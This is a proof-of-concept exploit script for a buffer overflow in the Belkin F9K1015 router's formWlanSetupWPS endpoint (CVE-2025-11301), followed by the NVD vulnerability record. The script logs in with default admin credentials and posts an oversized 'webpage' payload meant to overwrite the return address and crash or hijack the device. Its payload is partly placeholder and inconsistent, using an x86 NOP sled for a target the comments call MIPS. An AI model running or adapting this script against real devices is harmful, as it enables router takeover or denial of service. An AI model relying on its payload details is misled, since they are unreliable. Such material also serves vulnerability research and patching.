CVE-2025-11301

# CVE-2025-11301 PoC - Belkin F9K1015 formWlanSetupWPS Buffer Overflow # Vulnerability: Buffer overflow via 'webpage' parameter in /goform/formWlanSetupWPS # Affected: Belkin F9K1015 firmware v1.00.10 # CVSS: 8.8 (HIGH) import requests import sys from struct import pack TARGET_HOST = "http://192.168.2.1" # Default Belkin router address AUTH_USER = "admin" AUTH_PASS = "admin" # Default credentials or obtained credentials def exploit(target_host, username, password): """ Exploit buffer overflow in formWlanSetupWPS endpoint via the 'webpage' parameter. """ session = requests.Session() # Step 1: Authenticate to obtain session cookie login_url = f"{target_host}/login.cgi" login_data = { "login": "true", "username": username, "password": password } session.post(login_url, data=login_data) # Step 2: Construct overflow payload for 'webpage' parameter # Overflow the stack buffer to overwrite return address # Adjust offset based on the specific buffer size in the binary offset = 512 # Estimated offset to return address # Bad characters to avoid: \x00, \x0a, \x0d # Return address for MIPS little-endian (typical for Belkin routers) # This should point to a ROP gadget or shellcode location ret_address = pack("<I", 0x7f000000) # Placeholder return address # NOP sled + shellcode placeholder nop_sled = b"\x90" * 64 # x86 NOP sled (adjust for target arch) shellcode = b"\xcc" * 64 # Placeholder shellcode (INT3 breakpoints) payload = b"A" * offset payload += ret_address payload += nop_sled payload += shellcode # Step 3: Send malicious request to vulnerable endpoint vuln_url = f"{target_host}/goform/formWlanSetupWPS" params = { "webpage": payload.decode('latin-1'), # Additional parameters may be required "wps_action": "1" } headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0" } print(f"[*] Sending exploit to {vuln_url}") try: response = session.post(vuln_url, data=params, headers=headers, timeout=10) print(f"[*] Response status: {response.status_code}") print(f"[*] Response length: {len(response.content)}") except requests.exceptions.Timeout: print("[+] Target may have crashed - exploit possibly successful") except requests.exceptions.ConnectionError: print("[+] Connection refused - target may have crashed") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": host = sys.argv[1] if len(sys.argv) > 1 else TARGET_HOST user = sys.argv[2] if len(sys.argv) > 2 else AUTH_USER pwd = sys.argv[3] if len(sys.argv) > 3 else AUTH_PASS exploit(host, user, pwd)

{"cve": {"id": "CVE-2025-11301", "sourceIdentifier": "[email protected]", "published": "2025-10-05T20:15:31.430", "lastModified": "2026-02-24T07:16:24.983", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in Belkin F9K1015 1.00.10. This affects an unknown function of the file /goform/formWlanSetupWPS. This manipulation of the argument webpage causes buffer overflow. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:belkin:f9k1015_firmware:1.00.10:*:*:*:*:*:*:*", "matchCriteriaId": "3DEB0AFD-4E01-4FD5-8A41-6BD0E2D4DF0B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:belkin:f9k1015:-:*:*:*:*:*:*:*", "matchCriteriaId": "0D273CA6-07A9-43B2-87B3-D0DE1A5B89FA"}]}]}], "references": [{"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formWlanSetupWPS.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formWlanSetupWPS.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327182", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327182", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.661305", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formWlanSetupWPS.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formWlanSetupWPS.md#poc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}